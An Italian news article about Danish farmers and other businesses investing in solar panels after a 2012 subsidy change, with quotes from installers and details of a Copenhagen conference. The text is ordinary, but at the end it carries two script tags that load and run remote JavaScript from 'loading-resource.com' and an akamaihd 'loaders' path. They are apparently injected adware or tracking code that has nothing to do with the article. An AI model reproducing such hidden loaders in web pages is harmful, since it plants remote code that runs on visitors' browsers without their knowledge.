1. Home
  2. Notizie e Mercato
  3. Danimarca: il settore agricolo vuole investire nei sistemi di energia solare

Danimarca: il settore agricolo vuole investire nei sistemi di energia solare

Energie rinnovabili di
Da quando il governo danese ha cambiato le sue normative in materia di sovvenzione per l’energia solare lo scorso dicembre, i sistemi di energia solare sono diventati un investimento realistico e di crescente interesse per gli agricoltori danesi


È un buon affare per i protagonisti del settore agricolo investire in sistemi di celle solari, sia sui tetti delle loro aziende agricole, di solito di grandi dimensioni, sia montati nei loro campi. Negli scorsi mesi i meeting speciali dedicati al tema del solare, che sono stati organizzati per gli agricoltori in tutto il paese, hanno avuto un gran numero di adesioni.

Nel 2012, il Governo danese ha reso l’installazione di grandi sistemi di celle solari, fino a 400kW, perfino più vantaggiosa, con l’implementazione di nuove norme con cui gli agricoltori possono vendere tutta l’elettricità prodotta ad un network con un prezzo garantito di 1,30 corone danesi (0,17 centesimi di euro) per kWh in dieci anni. In alternativa, essi possono vendere solo il loro surplus energetico. In questo modo essi possono guadagnare grazie all’elettricità che producono per la rete e risparmiare sul loro consumo.

A contribuire anche  all’attrattività dell’investimento è il fatto che i sistemi fotovoltaici (PV) sono diventati più economici e sono più durevoli rispetto agli anni passati.

Infatti, l’industria solare in Danimarca ha riscontrato un enorme interesse non solo tra gli agricoltori, ma anche tra i proprietari di aree per il campeggio, comunità di quartiere e interi villaggi, associazioni immobiliari e imprese commerciali.
    
Noi prevediamo di installare molti sistemi fotovoltaici quest’anno,” dice Bjarne Rasmussen, uno dei fondatori di Drivhuseffekten, uno dei più grandi fornitori di impianti fotovoltaici in Danimarca, specializzato nella costruzione di grandi sistemi per le aziende commerciali e per comunità. La sua azienda ha installato il più grande impianto solare  in Scandinavia sul tetto dell’edificio degli uffici di Topdanmark, la seconda principale azienda di assicurazioni danese a Ballerup, vicino a Copenaghen.

"Al momento stiamo lavorando ad un grande progetto che prevede l’installazione di pannelli fotovoltaici sui tetti di due Municipi, quelli della città di Roskilde e della città di Egedal, di scuole, asili ed uffici, per un totale di 2 MW” dice Rasmussen, il quale sottolinea che i sistemi solari nei paesi e nelle città non devono necessariamente essere montati sui tetti degli edifici abitativi. “Cooperative edilizie potrebbero installare pannelli fotovoltaici anche sulle coperture dei posti auto e sui parcheggi.

Bjarne Rasmussen, in occasione della conferenza ‘The Solar Future: Denmark’ che si terrà a Copenhagen il 21 Marzo, illustrerà le possibilità per le aziende del settore sotto le nuove normative in materia di fotovoltaico.

Un altro esperto che terrà una presentazione durante il corso della conferenza, è il rinomato analista solare Pietro Radoia, della Bloomberg New Energy Finance. Radoia mostrerà come gli sviluppi dell’industria solare internazionale impatteranno sul mercato fotovoltaico Danese. Egli definisce “interessante” che la Danimarca abbia iniziato a fornire incentivi alle industrie commerciali per l’installazione di sistemi fotovoltaici di grande dimensioni.

Comunque, molti tra i protagonisti del mercato Danese, hanno evidenziato la presenza di due principali problemi: il primo riguarda una carenza nella comprensione delle nuove norme, come dichiara Kent Bisgaard della VE Energy, un piccolo fornitore di Pannelli fotovoltaici focalizzato in particolare sulle aziende agro-zootecniche , “Noi stiamo ancora aspettando linee guida ministeriali che ci forniscano gli strumenti per interpretare le nuove normative”.

Un altro problema è che, con le nuove normative, le aziende del fotovoltaico, per ottenere i profitti, devono installare i pannelli prima della fine di Dicembre 2013. “ Il tempo di elaborazione delle licenze per l’installazione di sistemi montati a terra è molto lungo, per questo speriamo che il Ministro proroghi le scadenze previste dalla nuova norma”, ha concluso Bisgaard.

Il Ministro del Clima, dell’Energia e dell’Edilizia, Martin Lidegaard, parteciperà alla conferenza per spiegare la politica governativa in material di energia solare, fornendo maggiori chiarimenti a proposito del piano per l’energia solare della Danimarca.


<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>